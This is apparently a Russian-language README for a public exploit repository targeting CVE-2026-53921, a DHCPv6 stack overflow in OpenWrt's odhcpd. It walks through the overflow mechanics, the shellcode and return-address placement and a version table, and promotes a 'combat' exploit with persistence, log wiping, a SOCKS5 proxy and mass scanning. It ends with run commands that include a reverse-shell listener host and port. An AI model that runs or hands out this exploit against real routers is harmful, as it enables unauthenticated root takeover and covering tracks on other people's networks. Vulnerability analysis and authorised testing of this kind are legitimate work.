
CVE-2026-53921 – переполнение стека odhcpd (CVSS 9.8) 🛡️ Подробный и всесторонний разбор уязвимости, верификатор и мультиэксплойт для RCE через DHCPv6 в OpenWrt. Двухвекторное (IA_NA/IA_PD) переполнение с shellcode для MIPS/ARM, ROP-цепочки, SOCKS5-прокси, персистентность, затирание логов и массовое сканирование. Используйте этично, оставайтесь в рамках закона. 🔒

⚠️ Только для образовательных целей и авторизованного тестирования. Несанкционированное использование незаконно.
CVE-2026-53921 — это критическое переполнение буфера стека в демоне odhcpd проекта OpenWrt — стандартном сервере DHCPv6/DHCPv4/RA.
Уязвимость существует в коде обработки сообщений DHCPv6 демона odhcpd,
а именно в функциях build_ia() и dhcpv6_ia_handle_IAs().
Ошибка возникает во время сериализации (упаковки) ответных пакетов DHCPv6.
Когда odhcpd отвечает на запросы клиентов, он формирует ответ в стековом
буфере фиксированного размера 512 байт без надлежащей проверки границ.
// Simplified representation of the vulnerable code
static void build_ia(struct dhcpv6_ia *ia, uint8_t *buf, size_t *len) {
// ❌ No bounds check before writing
memcpy(buf + *len, ia->data, ia->length);
*len += ia->length;
}
Злоумышленник отправляет DHCPv6 Request (или Solicit) со следующими параметрами:
Каждая опция потребляет место в стеке при формировании ответа odhcpd.
Накопленные данные превышают 512 байт, что вызывает переполнение.
Вектор Триггер Точка переполнения
Вектор 1 5 опций IA_NA build_ia() для IA_NA
с IPv6-адресами
build_ia() для IA_PDКорневая причина идентична, но переполнение возникает в разных участках кода, поэтому оба вектора одинаково эксплуатируемы.
Stack Layout (simplified):
+-------------------+ <-- High addresses
| Return Address | ← Overwritten with attacker-controlled value
+-------------------+
| Saved Frame Ptr |
+-------------------+
| Local Variables | ← 512-byte buffer
+-------------------+ <-- Low addresses
Злоумышленник перезаписывает сохранённый адрес возврата, чтобы он указывал на его шеллкод в памяти.
Требование Описание
Сетевой доступ Злоумышленник должен иметь IPv6-связность с целью
Аутентификация Не требуется — атака без аутентификации
Привилегии odhcpd работает от root, поэтому RCE
даёт полный контроль над системой
В реальном эксплойте шеллкод злоумышленника размещается в полях IPv6-адреса IAAddress (16 байт на каждую IA_NA). Сформированные пакеты упаковывают шеллкод, NOP-слайд и адрес возврата в эти поля.
Crafted IA_NA Structure:
+-------------------+
| IA_NA Header | (12 bytes)
+-------------------+
| IAAddress 1 | ← NOP sled + shellcode
+-------------------+
| IAAddress 2 | ← NOP sled + shellcode
+-------------------+
| IAAddress 3 | ← NOP sled + shellcode
+-------------------+
| IAAddress 4 | ← Return address
+-------------------+
| IAAddress 5 | ← Return address
+-------------------+
Crafted DHCPv6 Request
↓
odhcpd processes IA_NA/IA_PD options
↓
512-byte stack buffer overflows
↓
Return address overwritten
↓
CPU jumps to shellcode
↓
Reverse shell / Bind shell / RCE
↓
Full system compromise (root privileges)
Версия Статус Возможен ли RCE?
odhcpd < e432dd6 Уязвим ✅ Да OpenWrt < 24.10.8 Уязвим ✅ Да OpenWrt < 25.12.5 Уязвим ✅ Да OpenWrt 24.10.8+ Исправлено ❌ Нет OpenWrt 25.12.5+ Исправлено ❌ Нет odhcpd master + e432dd6 Исправлено ❌ Нет
Эта уязвимость особенно опасна, потому что:
odhcpd включён по умолчанию в установках OpenWrt.| Компонент | Уязвимые версии | Исправлено в |
|---|---|---|
odhcpd (ветка master) | до коммита e432dd6 | e432dd6 или новее |
| Релизы OpenWrt | < 24.10.8 < 25.12.5 | 24.10.8 и 25.12.5 |
Этот репозиторий содержит два независимых скрипта:
| Скрипт | Назначение | Эксплойт-код | Безопасность |
|---|---|---|---|
verifier.py | Неинвазивная проверка уязвимости | ❌ Нет | ✅ Безопасно |
exploit.py | Полноценный боевой эксплойт | ✅ Да | ⚠️ Опасно |
verifier.py — Проверка уязвимостиexploit.py — Полный эксплойтIA_NA (Site1) и IA_PD (Site2).git clone https://github.com/tc4dy/CVE-2026-53921-PoC-Exploit
cd CVE-2026-53921-PoC-Exploit
pip install -r requirements.txt
#Note: Both scripts need root privileges to craft raw IPv6 packets.
sudo python3 verifier.py -u fe80::1%eth0 -i eth0
sudo python3 exploit.py -u fe80::1%eth0 -i eth0 --lhost 192.168.1.100 --lport 4444
verifier.py| Аргумент | Описание |
|---|---|
-u, --target | IPv6-адрес цели (обязательно) |
-i, --iface | Сетевой интерфейс (по умолчанию: eth0) |
exploit.py